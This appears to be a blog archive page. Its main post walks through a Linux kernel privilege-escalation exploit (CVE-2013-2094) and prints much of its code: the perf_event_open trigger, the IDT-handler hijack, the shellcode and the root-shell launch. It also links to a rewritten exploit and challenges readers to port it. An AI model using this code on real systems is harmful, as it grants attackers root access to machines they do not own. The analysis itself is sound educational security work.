time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Introducing packagecloud.io

packagecloud.io: package repository hosting as a service

I’ve taken a bit of a break from blogging over the past several months to focus on a product my friend James and I are building. It helps solve a set of problems we’ve both suffered through many times before:

Setting up, managing, securing, and dealing with package repositories that support multiple architectures and linux distributions is painful, time consuming, and error-prone.

public launch

We are publicly launching packagecloud.io for the first time today to help ease the pain for hobbyists, devs, and ops people who need to host RPM, DEB, or RubyGem repositories for their personal projects, build systems, and internal infrastructure.

features

Some of the most exciting features for our initial launch include:

  • GPG signing of repositories
  • All repositories are served over HTTPS
  • Support for multiple Linux distributions in a single repository
  • Private repositories
  • Install scripts to get your repositories up and running quickly and easily

sign up and stay tuned

Sign up today and stay tuned for more to come soon.

Written by Joe Damato

April 14th, 2014 at 6:53 am

Posted in linux,systems

Available for consulting projects

I am happy to announce that I have launched my consulting company, Sassano Systems, and am now available for consulting projects.

If you have something that is slow, acting weird, or needs to be redesigned I can help.

My specialties are systems programming, debugging, and performance analysis. I build, maintain, and refactor anything written in C. I find and fix extremely elusive bugs in kernels, drivers, and system libraries. I tweak applications, operating systems, and drivers to get better performance.

Previous work

I’ve worked on a wide range of projects from unraveling and understanding recent Linux kernel exploits, to maintaining and extending widely used tracing tools, and even writing drivers to help test networking code. I’ve diagnosed tricky bugs in the Ruby MRI 1.8 virtual machine. I wrote a Ruby MRI 1.8 memory profiler that works by rewriting the Ruby virtual machine while it is running.

I’ve given talks in the US and internationally about some of the weird things I’ve seen inside of computers.

Specialties

  • C, x86 assembly, x86_64 assembly
  • Performance analysis, debugging
  • Kernels, drivers, debuggers, linkers, loaders, boot loaders
  • Build toolchains, cross platform build systems

Contact

To get more information about my rates or how I can help, check out my website at: http://sassanosystems.com.

Written by Joe Damato

June 10th, 2013 at 12:10 am

A closer look at a recent privilege escalation bug in Linux (CVE-2013-2094)

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. This exploit affects CentOS 5 and 6 as well as other Linux distributions; Linux kernel versions 2.6.37 to 3.8.9 are affected. I will explain this exploit from both the kernel side and the userland side to help readers get a better understanding of exactly how it works.

I did not write the original exploit and I did not discover this vulnerability. Full credit goes to the original author of the exploit. I don’t do computer security in any professional capacity, but I do think unraveling exploits is fun and interesting.

First, let’s start with some helpful background information about a few different things and then I’ll tie them all together at the end to walk through the exploit itself.

mmap and MAP_FIXED

mmap seems to come up quite a bit in my blog posts. If you’ve never used it before, it is a system call that allows you to map regions of memory into your process’ address space.

mmap can take a wide variety of flags. One useful flag is MAP_FIXED. This flag allows you to ask mmap to create a region of memory in your process’ address space starting at a specific address. Of course, this request may fail if another mapping is already present at the address you specify.
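
As a quick illustration, here is a minimal example of a MAP_FIXED request. This is my own sketch, not code from the exploit; the address 0x380000000 and the 4096-byte length are just placeholder values:

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
  /* ask for 4096 bytes mapped exactly at 0x380000000 */
  void *addr = mmap((void *) 0x380000000, 4096,
                    PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
                    -1, 0);

  if (addr == MAP_FAILED) {
    perror("mmap");
    return 1;
  }

  /* on success, addr is exactly the address we asked for */
  printf("mapped at %p\n", addr);
  return 0;
}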

The syscall wrapper function

Not every system call supported by the Linux kernel has a corresponding wrapper function in glibc (or other library). There are many reasons why this can happen. Sometimes, a new version of a Linux distribution is cut before glibc has been updated to support the new kernel interface. Other times, the glibc team decides for whatever reason that a particular kernel feature will not have a corresponding userland wrapper function exposed.

If you need to call a particular system call for which no wrapper exists in glibc, you can use the generic function syscall.

syscall works by allowing the programmer to pass in an arbitrary syscall number and an arbitrary set of arguments that will get passed over to the kernel. Sometimes, you can find a symbolic constant for the syscall number of the syscall you’d like to call in the unistd.h file for your system architecture.

On 64-bit CentOS 6, the header file /usr/include/asm/unistd_64.h contains lots of useful symbolic constants. For example, the constant for the syscall number for getpid looks something like this:

#define __NR_getpid          39
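
For example, here is a minimal program (my own, just for illustration) that calls getpid through the generic syscall function using that constant:

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(void)
{
  /* invoke getpid by syscall number instead of via the glibc wrapper */
  long pid = syscall(__NR_getpid);

  printf("pid: %ld\n", pid);
  return 0;
}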

Interrupt Descriptor Table and sidt

I’ve written about the interrupt descriptor table (IDT) a few times before, but all you really need to know is that the IDT is essentially an array of structures that the CPU uses to determine what action to take when an exception or interrupt is raised on the system.

A register called the IDTR on x86 and x86_64 processors stores a structure which describes the length and starting address of the IDT. The format of the data in this register when the CPU is in 64-bit mode can be represented by the following packed structure in C:

/* 64bit IDTR structure */
struct {
  uint16_t limit;
  uint64_t addr;
} __attribute__((packed)) idtr;

The value of this register can be stored or loaded with the sidt and lidt instructions, respectively.

The instruction to load a value into the IDTR, lidt, may only be executed by privileged code (in our case, this means kernel code).

The instruction to store the value in the IDTR, sidt may be executed by unprivileged code (in our case, this means userland).

The entries in the IDT array have the following format when the CPU is in 64-bit mode [1]:
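
The original post showed a screenshot of this layout from the Intel manual here. Since the image is not reproduced, the struct below is my own C rendering of the 64-bit interrupt gate format described in the Intel SDM [1]; it is not code from the exploit:

#include <stdint.h>

/* 64-bit IDT entry (interrupt/trap gate) layout */
struct idt_entry64 {
  uint16_t offset_low;   /* handler offset, bits 0..15             */
  uint16_t selector;     /* kernel code segment selector           */
  uint8_t  ist;          /* bits 0..2: interrupt stack table index */
  uint8_t  type_attr;    /* gate type, DPL, present bit            */
  uint16_t offset_mid;   /* handler offset, bits 16..31            */
  uint32_t offset_high;  /* handler offset, bits 32..63            */
  uint32_t reserved;
} __attribute__((packed));

Two details of this layout matter later: each entry is 16 bytes, and the upper 32 bits of the handler offset live 8 bytes into an entry. That is why the exploit will eventually target interrupt 4's entry at idt.addr + 0x48.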

Rewriting the semtex exploit to make it a bit more clear

I decided to rearrange the original exploit by adding white space, renaming functions, adding lots of comments, and moving some stuff around. I did this to help make the C code a bit more understandable to a beginner.

You can get the rewritten code from github here.

Linux kernel performance monitoring interface

The Linux kernel provides a set of system calls for performance monitoring. Some of the information about the low level interfaces provided by the kernel can be found here.

In particular, the function perf_event_open can be called by userland code to obtain a file descriptor which allows a program to gather performance information. perf_event_open can eventually call perf_swevent_init which is an internal kernel function that is called when a user program is attempting to initialize a software defined event.

Buggy increment in the kernel

Let’s take a look at the structure definition for the first argument to the perf_event_open function, struct perf_event_attr [2]:

struct perf_event_attr {
  /*
   * Major type: hardware/software/tracepoint/etc.
   */
  __u32                   type;

  /*
   * Size of the attr structure, for fwd/bwd compat.
   */
  __u32                   size;

  /*
   * Type specific configuration information.
   */
  __u64                   config;

  /* ... */

Notice that the field config is defined as a 64-bit unsigned integer.

Now let’s take a look at how perf_swevent_init uses the config field:

static int perf_swevent_init(struct perf_event *event)
{
  int event_id = event->attr.config;
 
  /* ... */
 
  if (event_id >= PERF_COUNT_SW_MAX)
    return -ENOENT;

  /* ... */
  
  atomic_inc(&perf_swevent_enabled[event_id]);

  /* ... */

This looks bad because the unsigned 64-bit config field is being cast to a signed 32-bit integer. That value is then used as an index to an array called perf_swevent_enabled.

And, so:

  1. The user supplies a value for config which has (at least) the 31st bit set to 1.
  2. This value is truncated to 32 bits and stored as event_id.
  3. The if statement checks event_id against PERF_COUNT_SW_MAX (which is 9 on CentOS 6 kernel 2.6.32-358.el6.x86_64) to ensure that event_id is less than PERF_COUNT_SW_MAX. Any negative event_id passes this check, so execution continues.
  4. The value in event_id is sign extended to 64 bits and then used as an offset into the perf_swevent_enabled array.
  5. Thus, any config value that yields a negative event_id will cause the kernel to call atomic_inc on a memory address that a user program can control (the short standalone program after this list walks through these steps with a concrete value).
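
Here is a small standalone program, my own and not part of the exploit, that demonstrates steps 1 through 4 with the value the exploit ends up using:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
  /* step 1: a config value with bit 31 set */
  uint64_t config = 0x00000000ffffffffULL;

  /* step 2: truncated to a signed 32-bit int, it becomes -1 */
  int event_id = (int) config;

  /* step 3: any negative event_id is less than PERF_COUNT_SW_MAX */
  printf("event_id = %d\n", event_id);

  /* step 4: used as an array index it is sign extended back to 64 bits,
   * so the effective byte offset from perf_swevent_enabled is: */
  printf("byte offset = %lld\n", (long long) event_id * 4);   /* prints -4 */

  return 0;
}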

Buggy decrement in the kernel

Let’s now examine the code which is executed when the file descriptor is closed:

static void sw_perf_event_destroy(struct perf_event *event)
{
  u64 event_id = event->attr.config;

  /* ... */
 
  atomic_dec(&perf_swevent_enabled[event_id]);

  /* ... */

This code is interesting because here the value in config is stored as an unsigned 64-bit value and used as an index into perf_swevent_enabled. This code path assumes that the open code path examined above will reject anyone with a config value that is too large.

However, as we saw above, if the user had successfully called perf_event_open with a large 64-bit unsigned value (which was interpreted as a 32-bit negative number) then the close code path will incorrectly offset from the perf_swevent_enabled with a large 64-bit unsigned value.

This allows a user program to cause the kernel to decrement an address that the userland program can control.

Exploit summary

Before I dig into the exploit, let’s take a step back and summarize what this exploit will do:

  • An initial memory region is allocated with mmap and MAP_FIXED and is used to determine where the buggy increments and decrements will land when offset from perf_swevent_enabled.
  • A memory region is allocated into which a NOP sled, a small piece of shellcode, and the malicious C code are copied.
  • The malicious code is rewritten at runtime to fill in values for the process’ uid and gid as well as the address of the upper 32-bits of the IDT handler for interrupt 4.
  • The upper 32-bits of the IDT handler for interrupt 4 are incremented by passing a carefully crafted config value to perf_event_open.
  • Interrupt 4 is triggered, which executes the shellcode and malicious code. The malicious code overwrites the uids and gids as well as the capability sets for the current process.
  • Once the interrupt handler returns and the exploit continues, it calls setuid to become root and then executes a bash shell as root.
  • Crazy shit.

Exploit

The exploit will use these buggy increment and decrement paths to force the kernel to eventually transfer execution to a known userland address that contains malicious code which elevates the credentials of the process allowing it to execute a shell as root.

A wrapper function for calling perf_event_open

The exploit contains a function called sheep which uses syscall (as described above) to call perf_event_open. I’ve renamed sheep in my rewrite to break_perf_event_open and rearranged the code to look like this:

static void
break_perf_event_open (uint32_t off) {

  struct perf_event_attr pea = {
    .type   = PERF_TYPE_SOFTWARE,
    .size   = sizeof(struct perf_event_attr),
    .config = off,
    .mmap   = 1,
    .freq   = 1,
  };
                                                                                                                                                                  
  /*
   * there is no wrapper for perf_event_open in glibc (on CentOS 6, at least),
   * so you need to use syscall(2) to call it.
   *
   * I copied the arguments out of the kernel (with the kernel explanation of
   * some of them) here for convenience.
   */
  int fd = syscall(__NR_perf_event_open,
                  &pea,   /* struct perf_event_attr __user *attr_uptr       */
                     0,   /* pid_t              pid       (target pid)      */
                    -1,   /* int                cpu       (target cpu)      */
                    -1,   /* int                group_fd  (group leader fd) */
                    0);   /* unsigned long      flags                       */

  if (fd < 0) {
          perror("perf_event_open");
          exit(EXIT_FAILURE);
  }

  if (close(fd) != 0) {
          perror("close");
          exit(EXIT_FAILURE);
  }

  return;
}

Setting up an initial memory region with mmap

map = mmap((void *) 0x380000000, 0x010000000,
                PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
                -1,
                0);

The exploit begins by creating a memory region with mmap at the address 0x380000000 with a length of 0x010000000 bytes (256 MB).

The address 0x380000000 was chosen because:

  • The address of the perf_swevent_enabled array is 0xffffffff81f360c0.
  • If the user passes -1 as config (through the uint32_t wrapper shown above, so the value actually stored in config is 0x00000000ffffffff), then the offset into the array in the close path will be 0xffffffff * 4 (multiplied by 4 because we are doing pointer arithmetic on an array of ints).
  • Adding that offset to the array’s address wraps around the 64-bit address space, so a decrement will be performed at the address 0x0000000381f360bc for a config value of -1.
  • Similarly, a decrement will be performed at the address 0x0000000381f360b8 for a config value of -2.

Thus, a region starting at 0x380000000 and extending until 0x390000000 will contain the address that the kernel will write to when decrementing the -1 and -2 offsets of perf_swevent_enabled.
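
The wraparound is easy to check with a few lines of C. This is my own sanity check, using the perf_swevent_enabled address from this particular CentOS 6 kernel:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
  /* kernel address of perf_swevent_enabled on this kernel */
  uint64_t p = 0xffffffff81f360c0ULL;

  /* -1 passed through the uint32_t wrapper is stored in config as 0xffffffff */
  uint64_t config = 0xffffffffULL;

  /* the close path indexes the int array with the full 64-bit value;
   * the addition wraps around the 64-bit address space */
  uint64_t target = p + config * 4;

  printf("decrement lands at 0x%016llx\n", (unsigned long long) target);
  /* prints 0x0000000381f360bc, inside the 0x380000000 mapping */
  return 0;
}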

The exploit then fills this memory region with 0s and calls a function called sheep in the original exploit (aka break_perf_event_open in my rewrite):

  memset(map, 0, SIZE);

  break_perf_event_open(-1);
  break_perf_event_open(-2);

After the above exploit code executes, an increment and a decrement have been performed by the kernel. The increment lands in kernel memory just below perf_swevent_enabled, while the decrement lands somewhere in the memory region allocated above.

Find the offset into the memory region where the write occurred

The exploit continues by iterating over the memory region to find where the decrement landed:

/* this for loop corresponds with lines 66-69 of the original exploit */

for (i = 0; i < SIZE/4; i++) {                                                                                                                             
  uint32_t *tmp = map + i;
  /* 
   * check if map[i] (aka tmp) is non zero.
   * also check if map[i+1] (aka tmp+1) is non zero.
   *
   * if both are non zero that means our calls above
   * break_perf_event_open(-1) and break_perf_event_open(-2) have
   * scribbled over memory this process allocated with mmap.
   */
  if (*tmp && *(tmp + 1)) {
          break;
  }
}

Retrieving the value of the IDTR and creating another memory region

The exploit continues by:

  • Retrieving the value stored in the IDTR with sidt
  • Masking the upper 32 bits and the lower 24 bits of the 64-bit IDT base address away
  • Allocating a memory region starting at the adjusted address
  /* this instruction and the subsequent mask correspond to lines 71-72 in
   * the original exploit.
   */
  asm volatile ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  
  /* allocate KSIZE bytes at address kbase */
  code = mmap((void *) kbase, KSIZE,
                  PROT_READ | PROT_WRITE | PROT_EXEC,
                  MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
                  -1,
                  0);

This is the memory region to which the kernel will transfer control. I will explain soon how execution will be transferred to this address and why the 0xff000000 bitmask was applied.

Preparing the target memory region

The exploit now prepares the memory region:

  • The memory region is filled with the value 0x90 which is the opcode for the NOP instruction (See the wikipedia page about the NOP sled for more information).
  • The malicious code from the function fuck (renamed to fix_idt_and_overwrite_creds) is copied into the memory region after a healthy sized NOP sled.
  • A small shellcode stub (that we will examine shortly) is prepared and copied into the memory region just before the malicious code.
  /*
   * fill the region of memory we just mapped with 0x90 which is the x86
   * NOP instruction.
   */
  memset(code, 0x90, KSIZE);

  /* move the code pointer up to the start of the last 1024 bytes of the                                                                                     
   * mapped region.
   *
   * this leaves (32 megabytes - 1024 bytes) of NOP instructions in
   * memory.
   */
  code += (KSIZE-1024);

  /* copy the code for the function above to the memory region */
  memcpy(code, &fix_idt_and_overwrite_creds, 1024);

  /* copy our shell code just before the code above */
  memcpy(code - shellcode_sz, shellcode, shellcode_sz);

A closer look at the malicious code

Before we can examine the rest of the exploit, we'll first need to understand the malicious code that is copied into the memory region.

The malicious code, originally called fuck, but renamed to fix_idt_and_overwrite_creds has a few goals:

  • Restore as much of the overwritten kernel data as possible or at least enough for the kernel to continue (mostly) working.
  • Find the kernel data structure that lives at the start of the kernel stack. This is a struct thread_info.
  • Find the pointer in struct thread_info to the current struct task_struct. This should be easy once the struct thread_info is located, as it is the first field in struct thread_info.
  • Find the struct cred pointer in the current struct task_struct.
  • Overwrite the various uids and gids as well as the kernel_cap_t fields.

The original exploit code for this is a bit painful to read. In my rewritten exploit I added a lot of comments to the code to help explain how each of these goals is accomplished.

Take a look at the code here.

Cleaning up after itself

One of the first things that fuck (aka fix_idt_and_overwrite_creds) does is fix the upper 32-bits of the IDT handler offset for software interrupt 4, by doing this:

/* This marker will eventually be replaced by the address of the upper 32-bits
 * of the IDT handler address we are overwriting.
 *
 * Thus, the write on the following line to -1 will restore the original value
 * of the IDT entry which we will overwrite 
 */
uint32_t *fixptr = (void*) GENERATE_MARKER(1);
*fixptr = -1;

Locating the uids and gids

The most interesting part of this malicious code (for me, at least) is how exactly it locates the uids and gids that need to be overwritten.

You'll notice that in the main function of the exploit, the exploit has the following code:

/* get the current userid and groupids */
u = getuid();
g = getgid();

/* set all user ids and group ids to be the same, this will help find this
 * process' credential structure later.
 */
setresuid(u, u, u);
setresgid(g, g, g);

This code ensures that all the uids and gids are set to the current uid and gid. This is done so that the malicious code that executes later can search memory for a sequence of uids and gids and "know" that it has found the right place to begin overwriting data.
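
To make the idea concrete, here is a rough sketch of that search-and-overwrite step. This is my own simplified illustration, not the exploit's code: it assumes it is handed a pointer to candidate kernel memory, and it assumes (based on the CentOS 6 struct cred layout described here) that the uid/gid pairs sit in four consecutive 64-bit words with the capability sets immediately following them.

#include <stdint.h>
#include <stddef.h>

/* look for four consecutive 64-bit words equal to ((gid << 32) | uid) --
 * the pattern setresuid()/setresgid() arranged -- then zero them (root)
 * and saturate the words that follow, which hold the capability sets.
 * the offsets used here are assumptions for illustration only. */
static int rewrite_creds_sketch(uint64_t *candidate, size_t nwords,
                                uint64_t uid_gid_marker)
{
  for (size_t i = 0; i + 6 <= nwords; i++) {
    if (candidate[i]     == uid_gid_marker &&
        candidate[i + 1] == uid_gid_marker &&
        candidate[i + 2] == uid_gid_marker &&
        candidate[i + 3] == uid_gid_marker) {

      /* uid/gid, suid/sgid, euid/egid, fsuid/fsgid -> 0 (root) */
      candidate[i]     = 0;
      candidate[i + 1] = 0;
      candidate[i + 2] = 0;
      candidate[i + 3] = 0;

      /* grant every capability in the sets that follow */
      candidate[i + 4] = 0xffffffffffffffffULL;
      candidate[i + 5] = 0xffffffffffffffffULL;

      return 1;
    }
  }

  return 0;
}

The real malicious code also has to find something to hand a search like this in the first place, which is where walking from the kernel stack to struct thread_info and then to the current struct task_struct (the goals listed earlier) comes in.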

Another interesting thing to note about the malicious code is that it gets modified at runtime after it has been copied to the memory region described above.

Rewriting parts of the malicious code at runtime

The malicious code needs to be overwritten at runtime after it has been copied to the memory region to which control will be transferred, for two main reasons:

  1. At compile time the process' uid and gid may not be known.
  2. At compile time the address of any overwritten kernel state may not be known. As we will soon see, this overwritten state is part of the IDT handler offset for a particular software interrupt.

In order to accomplish these goals, you will notice that the fuck function (or fix_idt_and_overwrite_creds) has a series of "markers" in place:

  /* create a few markers which will be filled in with the
   * ((group id << 32) | user id) later by the exploit.
   */
  uint64_t uids[4] = {	GENERATE_MARKER(2),
			GENERATE_MARKER(3),
			GENERATE_MARKER(4),
			GENERATE_MARKER(5)
  };
  
  /* ... */

  uint32_t *fixptr = (void*) GENERATE_MARKER(1);

These values are simply unique enough bit patterns that can be located later and overwritten.

The main function of the exploit takes care of that by doing this:

for (j = 5; j > 0; j--) {
  /* generate marker values */
  needle = GENERATE_MARKER(j);
  
  /* find marker values in the malicious code copied to our memory
   * region
   */
  p = memmem(code, 1024, &needle, 8);
  if (!p) {
      fprintf(stderr, "couldn't find the marker values (this is "
                      "bad)\n");
      break;
  }
  
  if (j > 1) {
    /* marker values [2 - 5] will be replaced with the uid/gid of this process */
    *p = ((g << 32) | u);
  } else {                                                                                                                                                      
    /* marker value 1 will be replaced with the address of the upper 32-bits of
     * the IDT handler entry we will hijack. this address will be used to restore
     * the overwritten state later.
     */
    *p = idt.addr + 0x48;
  }
}

Incrementing the address of an IDT handler

Now, everything is in place. It is time for the exploit to connect all the pieces together before triggering the malicious code and executing a root shell.

The last piece of the puzzle was pretty interesting for me as this was my first time seeing this attack vector, but after I understood what was happening and did some googling I located a phrack article from 2007 that explains this attack vector.

This exploit works by incrementing the upper 32-bits of a 64-bit IDT entry's handler offset (see the IDT entry layout shown earlier). The IDT entry for the overflow exception, software interrupt 4, was chosen because it is not particularly important and can be temporarily "borrowed" by this exploit.

Since the overflow exception's handler is located in kernel memory, the upper 32-bits of the 64-bit handler offset are 0xffffffff. Incrementing 0xffffffff causes an overflow to 0x00000000 and thus the 64-bit IDT handler's offset goes from 0xffffffff[lower 32bits] to 0x00000000[lower 32bits].

Or in other words, changing the top 32-bits of the address to 0 changes the address from a location in kernel memory to a location that can be mapped with mmap and MAP_FIXED.
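
A tiny example (mine, with a hypothetical handler address) of what that single increment does:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
  /* hypothetical kernel-space handler address for interrupt 4 */
  uint64_t handler = 0xffffffff81412340ULL;

  /* the IDT entry stores the upper 32 bits of the offset separately */
  uint32_t upper = handler >> 32;            /* 0xffffffff */

  upper += 1;                                /* wraps to 0x00000000 */

  handler = ((uint64_t) upper << 32) | (handler & 0xffffffff);
  printf("handler is now 0x%016llx\n", (unsigned long long) handler);
  /* prints 0x0000000081412340: a userland-mappable address */
  return 0;
}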

This is why the IDT's base address was masked earlier in the exploit like this:

/*
 * the "sidt" instruction retrieves the base Interrupt Descriptor Table 
 *
 * this instruction and the subsequent mask correspond to lines 71-72 in
 * the original exploit.
 */

asm volatile ("sidt %0" : "=m" (idt));
kbase = idt.addr & 0xff000000;

The actual increment happens when the following code executes:

break_perf_event_open(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);

This code does some tricky arithmetic to calculate the config value that must be passed to the buggy kernel increment path so that the increment lands on the upper 32-bits of the 64-bit IDT handler offset for software interrupt 4.
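
Here is my own back-of-the-envelope reconstruction of that arithmetic, not code from the original exploit. It assumes i is the 4-byte index at which the config = -2 decrement landed during the scan earlier, and it uses the 16-byte IDT entry layout shown near the top of the article:

#include <stdint.h>

/* compute the config value whose buggy increment lands on the upper 32 bits
 * of interrupt 4's handler offset. purely illustrative; the variable meanings
 * are assumptions based on the rewritten exploit. */
static uint32_t increment_config_sketch(uint64_t idt_addr, uint64_t i)
{
  /* from the scan: 0x380000000 + 4*i == 0x300000000 + (P & 0xffffffff) - 8,
   * where P is the kernel address of perf_swevent_enabled, so:            */
  uint64_t p_low = 4 * i + 8 + 0x80000000ULL;

  /* target of the increment: interrupt 4's entry is at idt_addr + 4 * 16,
   * and the upper half of the handler offset is 8 bytes into the entry    */
  uint64_t target_low = (idt_addr & 0xffffffff) + 0x48;

  /* the increment path writes to P + 4 * event_id, so solve for event_id.
   * algebraically this simplifies to:
   *   -i + ((idt_addr & 0xffffffff) - 0x80000000) / 4 + 16
   * which is the exact expression passed to break_perf_event_open above   */
  int64_t diff = (int64_t) target_low - (int64_t) p_low;

  return (uint32_t) (diff / 4);
}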

Triggering the exploit

Now that everything is hooked in, triggering the exploit is simple:

/*
 * trigger the hijacked interrupt handler
 */
asm volatile("int $0x4");

This raises the interrupt causing the CPU to transfer control to the (modified) IDT handler address which is actually just the memory region we created above and copied NOPs, shellcode, and malicious C code into.

After the NOPs execute, the shellcode executes:

static char shellcode[] = "\x0f\x01\xf8"       /*  swapgs                    */
                          "\xe8\x05\x0\x0\x0"  /*  callq
                                                *  (this callq transfers
                                                *  execution to after this piece
                                                *  of shellcode, where the
                                                *  fix_idt_and_overwrite_creds
                                                *  function will live)
                                                */
                          "\x0f\x01\xf8"       /*  swapgs                    */
                          "\x48\xcf";          /*  iretq                     */

This shell code:

  • Swaps in a stored value for the GS register, which the kernel needs for accessing internal data.
  • Transfers control to our malicious C code (fuck, aka fix_idt_and_overwrite_creds).
  • After the malicious C code returns, the shellcode continues by swapping the GS register back out.
  • And finally, it returns to userland with iret.

Dat root shell

After the above code executes, the malicious code has run and the uids and gids of the process, as well as its capability sets, have been overwritten. The process can now change its uid to root and execute a shell as root:

/*
 * at this point we should be able to set the userid of this process to
 * 0.
 */
if (setuid(0) != 0) {
  perror("setuid");
  exit(EXIT_FAILURE);
}

/*
 * launch bash as uid 0
 */
return execl("/bin/bash", "-sh", NULL);

Easily one of the most insane exploits I've seen, but that isn't saying much since I don't look at exploits all that often.

Exercise for the reader

Now that you know how this exploit works, go make it work on a 64-bit Ubuntu. No, seriously, do it.

Conclusion

  • Dealing with integers in C code is tricky. Be careful and get people to review your code.
  • Hijacking IDT entries to scan kernel memory to find and overwrite kernel data structures to elevate privileges of a user process so it can then execute a bash shell as root is pretty nuts.
  • MAP_FIXED is actually much more useful than I had previously imagined.
  • Reading exploit code is fun and interesting. You should do it more often than you probably do right now.
  • I'm tired from writing this much.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. Intel® 64 and IA-32 Architectures Software Developer’s Manual, Volume 3A: System Programming Guide, Part 1, Section 5.1: Interrupt and Exception Overview
  2. /usr/include/linux/perf_event.h, line 198

Written by Joe Damato

May 20th, 2013 at 10:29 pm

Digging out the craziest bug you never heard about from 2008: a linux threading regression

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This blog post will show how a fix for XFree86 and linuxthreads ended up causing a major threading regression about 7 years after the fix was created.

The regression was in pthread_create: thread creation became dramatically slower as the number of threads in a process increased. This bug is present on CentOS 5.3 (and earlier) and other Linux distros as well.

It is also very possible that this bug impacted research done before August 15, 2008 (in the best case because Linux distro releases are slow) on building high performance threaded applications.

Digging this thing out was definitely one of the more interesting bug hunts in recent memory.

Hopefully, my long (and insane) story will encourage you to thoroughly investigate suspicious sources of performance degradation before applying the “[thing] is slow” label.

[thing] might be slow, but it may be useful to understand why.

Versions

This blog post will be talking about:

  • glibc 2.7. Earlier versions are probably affected, but you will need to go look and see for sure.
  • Linux kernels earlier than 2.6.27. Some linux distributions will backport fixes, so it is possible you could be running an earlier kernel version, but without the bug described below. You will need to go look and see for sure.

Linux’s mmap and MAP_32BIT

mmap is a system call that a program can use to map regions of memory into its address space. mmap can be used to map files into RAM and to share these mappings with other processes. mmap is also used by memory allocators to obtain large regions of memory that can be carved up and handed out to a program.

On June 29, 2001, Andi Kleen added a flag to Linux’s mmap called MAP_32BIT. This commit message reads in part [1]:

This adds a new mmap flag to force mappings into the low 32bit address space.
Useful e.g. for XFree86’s ELF loader or linuxthreads’ thread local
data structures.

As Kleen mentions, XFree86 has its own ELF loader that appears to have been released as part of the 4.0.1 release back in 2000. The purpose of this ELF loader is to allow loadable module support for XFree86 even on systems that don’t necessarily have support for loadable modules. Another interesting side effect of the decision to include an ELF loader is that loadable modules can be built once and then reused on any system that XFree86 supports without recompiling the module source.

It appears that Kleen added MAP_32BIT to allow programs (like XFree86) which assumed mmap would always return 32-bit addresses to continue to work properly as 64-bit processors were beginning to enter the market.
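
For reference, here is a minimal example (mine, not code from any of the projects mentioned) of asking for a low mapping with the flag:

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
  /* ask for an anonymous mapping somewhere in low memory */
  void *addr = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                    MAP_32BIT | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

  if (addr == MAP_FAILED) {
    perror("mmap");
    return 1;
  }

  /* on the kernels discussed below, this address ends up between
   * 0x40000000 and 0x80000000 */
  printf("mapped at %p\n", addr);
  return 0;
}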

Then, on November 11, 2002, Egbert Eich added some code to XFree86 to actually use the MAP_32BIT flag. The commit message says:

532. Fixed module loader to map memory in the low 32bit address space on
x86-64 (Egbert Eich).

Thus, 64-bit XFree86 builds would now have a working ELF loader since those builds would be able to get memory with 32-bit addresses.

I will touch on the threading implications mentioned in Kleen’s commit message a bit later.

ELF small code execution model and a tweak to MAP_32BIT

The AMD64 ABI lists several different code models which differ in addressing, code size, data size, and address range.

Specifically, the spec defines something called the small code model.

The small code model is defined such that all symbols are known to be located in the range from 0 to 0x7EFFFFFF (among other things that are way beyond the scope of this blog post).

In order to support this code model, Kleen added a small tweak to MAP_32BIT that limits the range of addresses mmap will return.

Unfortunately, I have not been able to track down the exact commit with Kleen’s commit message (if there was one), but it occurred sometime between November 28, 2002 (kernel 2.4.20) and June 13, 2003 (kernel 2.4.21).

I did find what looks like a merge commit or something. It shows the code Kleen added and a useful comment explaining why the address range was being limited:

+	} else if (flags & MAP_32BIT) { 
+		/* This is usually used needed to map code in small
+		   model: it needs to be in the first 31bit. Limit it
+		   to that.  This means we need to move the unmapped
+		   base down for this case.  This may give conflicts
+		   with the heap, but we assume that malloc falls back
+		   to mmap. Give it 1GB of playground for now. -AK */ 
+		if (!addr) 
+			addr = 0x40000000; 
+		end = 0x80000000;		

Unfortunately, now the flag’s name MAP_32BIT is inaccurate.

The range has been limited to a single gigabyte from 0x40000000 (1gb) – 0x80000000 (2gb). This is good enough for the ELF small code model mentioned above, but this means any memory successfully mapped with MAP_32BIT is actually mapped within the first 31 bits and thus this flag should probably be called MAP_31BIT or something else that more accurately describes its behavior.

Oops.

pthread_create and thread stacks

When you create a thread using pthread_create there are two ways to allocate a region of memory for that thread to use as its stack:

  • Allow libpthread to allocate the stack itself. You do this by simply calling pthread_create. This is the common case for most programs. Use pthread_attr_getstacksize and pthread_attr_setstacksize to get and set the stack size.

or

  • A three step process:

    1. Allocate a region of memory possibly with mmap, malloc (which may just call mmap for large allocations), or statically.
    2. Use pthread_attr_setstack to set the address and size of the stack in a pthread attribute object.
    3. Pass said attribute object along to pthread_create and the thread which is created will have your memory region set as its stack.
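
Here is a minimal sketch (my own, using an arbitrary 1MB stack size) of that three step process:

#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

static void *worker(void *arg)
{
  return NULL;
}

int main(void)
{
  size_t stack_size = 1024 * 1024;   /* hypothetical 1MB stack */

  /* step 1: allocate the region ourselves, here with mmap */
  void *stack = mmap(NULL, stack_size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (stack == MAP_FAILED) {
    perror("mmap");
    return EXIT_FAILURE;
  }

  /* step 2: record the address and size in a pthread attribute object */
  pthread_attr_t attr;
  pthread_attr_init(&attr);
  pthread_attr_setstack(&attr, stack, stack_size);

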